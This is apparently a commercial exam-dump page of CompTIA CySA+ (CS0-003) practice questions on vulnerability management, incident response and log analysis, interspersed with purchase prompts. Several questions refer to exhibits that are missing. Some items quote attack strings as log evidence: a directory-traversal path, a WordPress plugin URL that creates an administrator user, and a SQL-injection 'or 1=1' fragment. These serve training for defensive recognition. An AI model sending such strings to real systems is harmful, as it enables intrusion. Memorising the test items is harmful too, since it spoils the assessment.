Which of the following will the command line display?

Options:

A.

Encrypted web requests and Domain Name System (DNS) traffic

B.

Unencrypted web requests and DNS traffic

C.

Neither encrypted nor unencrypted web and DNS traffic

D.

Both encrypted and unencrypted web and DNS traffic

Buy Now
Questions 98

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

Options:

A.

Credentialed network scanning

B.

Passive scanning

C.

Agent-based scanning

D.

Dynamic scanning

Buy Now
Questions 99

A security analyst needs to identify an asset that should be remediated based on the following information:

    File ServerCVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H/

    Web ServerCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/

    Mail Server (corrected from “Mall server”)CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/

    Domain ControllerCVSS:3.1/AV:N/AC:L/PR:R/UI:R/S:U/C:H/I:H/A:H/

Which of the following assets should the analyst remediate first?

Options:

A.

Mail server

B.

Domain controller

C.

Web server

D.

File server

Buy Now
Questions 100

A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would best all ow the organization to identity rogue

devices more quickly?

Options:

A.

Implement a continuous monitoring policy.

B.

Implement a BYOD policy.

C.

Implement a portable wireless scanning policy.

D.

Change the frequency of network scans to once per month.

Buy Now
Questions 101

Which of the following actions would an analyst most likely perform after an incident has been investigated?

Options:

A.

Risk assessment

B.

Root cause analysis

C.

Incident response plan

D.

Tabletop exercise

Buy Now
Questions 102

While a security analyst for an organization was reviewing logs from web servers. the analyst found several successful attempts to downgrade HTTPS sessions to use cipher modes of operation susceptible to padding oracle attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two).

Options:

A.

Configure the server to prefer TLS 1.3.

B.

Remove cipher suites that use CBC.

C.

Configure the server to prefer ephemeral modes for key exchange.

D.

Require client browsers to present a user certificate for mutual authentication.

E.

Configure the server to require HSTS.

F.

Remove cipher suites that use GCM.

Buy Now
Questions 103

Which of the following should be configured in a WAF to mitigate an RCE attack?

Options:

A.

Rate control in deny mode

B.

Rule to detect and block OS commands

C.

Parameterized queries

D.

Stored procedure in the database

Buy Now
Questions 104

While reviewing the web server logs, a security analyst notices the following snippet:

.. \ .. / .. \ .. /boot.ini

Which of the following Is belng attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of /etc/passwd

Buy Now
Questions 105

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

Options:

A.

grep [IP address] packets.pcapB cat packets.pcap | grep [IP Address]

B.

tcpdump -n -r packets.pcap host [IP address]

C.

strings packets.pcap | grep [IP Address]

Buy Now
Questions 106

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

Options:

A.

Impact

B.

Vulnerability score

C.

Mean time to detect

D.

Isolation

Buy Now
Questions 107

An analyst is reviewing processes running on a Windows host. The analyst reviews the following information:

Which of the following processes should the analyst review first?

Options:

A.

533

B.

740

C.

768

D.

1100

Buy Now
Questions 108

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

Options:

A.

C2 beaconing activity

B.

Data exfiltration

C.

Anomalous activity on unexpected ports

D.

Network host IP address scanning

E.

A rogue network device

Buy Now
Questions 109

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output:

Which of the following hosts should be patched first, based on the metrics?

Options:

A.

host01

B.

host02

C.

host03

D.

host04

Buy Now
Questions 110

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:

. Must use minimal network bandwidth

. Must use minimal host resources

. Must provide accurate, near real-time updates

. Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

Options:

A.

Internal

B.

Agent

C.

Active

D.

Uncredentialed

Buy Now
Questions 111

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?

Options:

A.

Add the IP address to the EDR deny list.

B.

Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification.

C.

Implement a prevention policy for the IP on the WAF

D.

Activate the scan signatures for the IP on the NGFWs.

Buy Now
Questions 112

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

Options:

A.

Beaconinq

B.

Domain Name System hijacking

C.

Social engineering attack

D.

On-path attack

E.

Obfuscated links

F.

Address Resolution Protocol poisoning

Buy Now
Questions 113

A company recently experienced a security incident. The security team has determined

a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each

control may only be used once, and not all controls will be used.

Firewall log:

File integrity Monitoring Report:

Malware domain list:

Vulnerability Scan Report:

Phishing Email:

Options:

Buy Now
Questions 114

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).

Options:

A.

Drop the tables on the database server to prevent data exfiltration.

B.

Deploy EDR on the web server and the database server to reduce the adversaries capabilities.

C.

Stop the httpd service on the web server so that the adversary can not use web exploits

D.

use micro segmentation to restrict connectivity to/from the web and database servers.

E.

Comment out the HTTP account in the / etc/passwd file of the web server

F.

Move the database from the database server to the web server.

Buy Now
Questions 115

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Which of the following did the consultant do?

Options:

A.

Implanted a backdoor

B.

Implemented privilege escalation

C.

Implemented clickjacking

D.

Patched the web server

Buy Now
Questions 116

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

Options:

A.

Conduct regular red team exercises over the application in production

B.

Ensure that all implemented coding libraries are regularly checked

C.

Use application security scanning as part of the pipeline for the CI/CDflow

D.

Implement proper input validation for any data entry form

Buy Now
Questions 117

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user & role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Buy Now
Questions 118

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

Options:

A.

Eradication

B.

Recovery

C.

Containment

D.

Preparation

Buy Now
Questions 119

A security analyst is assessing the security of a cloud environment. The following output is generated when the assessment runs:

    Authentication error

    Instance not found on preset location

Which of the following should the analyst use to fix the issue?

Options:

A.

run module_name and exec < module_name >

B.

--session < session_name > and --module-args= " < arg1 > "

C.

set_regions < region1 > and set_key

D.

--whoami and --data < service_name >

Buy Now
Questions 120

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company ' s current method that relies on CVSSv3. Given the following:

Which of the following vulnerabilities should be prioritized?

Options:

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Buy Now
Questions 121

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

Options:

A.

Risk register

B.

Vulnerability assessment

C.

Penetration test

D.

Compliance report

Buy Now
Questions 122

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Options:

A.

Implement segmentation with ACLs.

B.

Configure logging and monitoring to the SIEM.

C.

Deploy MFA to cloud storage locations.

D.

Roll out an IDS.

Buy Now
Questions 123

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

Options:

A.

Blocklisting

B.

Allowlisting

C.

Graylisting

D.

Webhooks

Buy Now
Questions 124

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

Options:

A.

Identify any improvements or changes in the incident response plan or procedures

B.

Determine if an internal mistake was made and who did it so they do not repeat the error

C.

Present all legal evidence collected and turn it over to iaw enforcement

D.

Discuss the financial impact of the incident to determine if security controls are well spent

Buy Now
Questions 125

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization ' s network?

Options:

A.

Utilize an RDP session on an unused workstation to evaluate the malware.

B.

Disconnect and utilize an existing infected asset off the network.

C.

Create a virtual host for testing on the security analyst workstation.

D.

Subscribe to an online service to create a sandbox environment.

Buy Now
Questions 126

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

Options:

A.

SLA

B.

MOU

C.

Best-effort patching

D.

Organizational governance

Buy Now
Questions 127

Which of the following best explains the importance of the implementation of a secure software development life cycle in a company with an internal development team?

Options:

A.

Increases the product price by using the implementation as a piece of marketing

B.

Decreases the risks of the software usage and complies with regulatory requirements

C.

Improves the agile process and decreases the amount of tests before the final deployment

D.

Transfers the responsibility for security flaws to the vulnerability management team

Buy Now
Questions 128

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Buy Now
Questions 129

A sales application was remediated to address a critical vulnerability. The process took five business hours and was ultimately successful. However, the change advisory board informed the company’s leadership team that the process resulted in a considerable financial loss. Which of the following best explains the reason for the financial loss?

Options:

A.

The loss is a normal cost of operations that relies on IT.

B.

The Chief Information Officer did not notify the board members.

C.

The IT team should have hired a penetration testing team before patching.

D.

The maintenance window was not properly communicated or scheduled.

Buy Now
Questions 130

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

Options:

A.

Header analysis

B.

Packet capture

C.

SSL inspection

D.

Reverse engineering

Buy Now
Questions 131

Which of the following are the most relevant factors related to vulnerability management reporting and communication within an organization?

Options:

A.

Risk assessment, asset inventory, business impact analysis, and business continuity plans

B.

Patch availability, mean time to remediate, dependencies, and disaster recovery plans

C.

False-positive rates, alert volume and characteristics, mean time to detect, and skills inventory

D.

Risk severity levels, timelines, dependencies, and remediation ownership

Buy Now
Questions 132

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?

Options:

A.

DNS

B.

tcpdump

C.

Directory

D.

IDS

Buy Now
Questions 133

A security analyst needs to identify the devices in a critical infrastructure network that handles an oil and gas pipeline. The network has devices connected over IPv4 using either HTTP or Modbus protocols running on the standard ports. Which of the following approaches should the analyst use to achieve the objective?

Options:

A.

Employ the IT vulnerability scanner to target ports 80 and 502.

B.

Use banner grabbing with Netcat on TCP ports 80 and 502.

C.

Perform an Nmap -sS -A -p 80,502 scan.

D.

Scan the ICS network using Masscan --open-only -p80,502.

Buy Now
Questions 134

A security operations center analyst is reviewing a scan report and must prioritize items for remediation based on severity:

The Chief Information Security Officer requires the following:

• Encryption in transit

• Encryption at rest

• Encryption of customer data

Which of the following databases should the analyst remediate first?

Options:

A.

Databaset

B.

Database2

C.

Database3

D.

Database4

Buy Now
Questions 135

An organization has implemented code into a production environment. During a routine test, a penetration tester found that some of the code had a backdoor implemented, causing a developer to make changes outside of the change management windows. Which of the following is the best way to prevent this issue?

Options:

A.

SDLC training

B.

Dynamic analysis

C.

Debugging

D.

Source code review

Buy Now
Questions 136

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

Options:

A.

function x() { info=$(geoiplookup $1) & & echo " $1 | $info " }

B.

function x() { info=$(ping -c 1 $1 | awk -F " / " ’END{print $5}’) & & echo " $1 | $info " }

C.

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F " .in-addr " ’{print $1} ' ).origin.asn.cymru.com TXT +short) & & echo " $1 | $info " }

D.

function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) & & echo " $1 | $info " }

Buy Now
Questions 137

AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).

Options:

A.

Implement an IPS in front of the web server.

B.

Enable MFA on the website.

C.

Take the website offline until it is patched.

D.

Implement a compensating control in the source code.

E.

Configure TLS v1.3 on the website.

F.

Fix the vulnerability using a virtual patch at the WAF.

Buy Now
Questions 138

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

Options:

A.

Mean time to detect

B.

Mean time to respond

C.

Mean time to remediate

D.

Service-level agreement uptime

Buy Now
Questions 139

K company has recently experienced a security breach via a public-facing service. Analysis of the event on the server was traced back to the following piece of code:

SELECT ’ From userjdata WHERE Username = 0 and userid8 1 or 1=1;—

Which of the following controls would be best to implement?

Options:

A.

Deploy a wireless application protocol.

B.

Remove the end-of-life component.

C.

Implement proper access control.

D.

Validate user input.

Buy Now
Questions 140

An analyst is reviewing system logs while threat hunting:

Which of the following hosts should be investigated first?

Options:

A.

PC1

B.

PC2

C.

PC3

D.

PC4

E.

PC5

Buy Now
Questions 141

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Buy Now
Questions 142

Which of the following best describes the key elements of a successful information security program?

Options:

A.

Business impact analysis, asset and change management, and security communication plan

B.

Security policy implementation, assignment of roles and responsibilities, and information asset classification

C.

Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D.

Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

Buy Now
Questions 143

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being

used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Options:

A.

Leave the proxy as is.

B.

Decomission the proxy.

C.

Migrate the proxy to the cloud.

D.

Patch the proxy

Buy Now
Questions 144

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization ' s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor ' s actions?

Options:

A.

Delivery

B.

Reconnaissance

C.

Exploitation

D.

Weaponizatign

Buy Now
Questions 145

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

Options:

A.

10.101.27.98

B.

54.73.225.17

C.

54.74.110.26

D.

54.74.110.228

Buy Now
Exam Code: CS0-003
Exam Name: CompTIA CyberSecurity Analyst CySA+ Certification Exam
Last Update: Jul 7, 2026
Questions: 462
CS0-003 pdf

CS0-003 PDF

$25.5  $84.99
CS0-003 Engine

CS0-003 Testing Engine

$30  $99.99
CS0-003 PDF + Engine

CS0-003 PDF + Testing Engine

$40.5  $134.99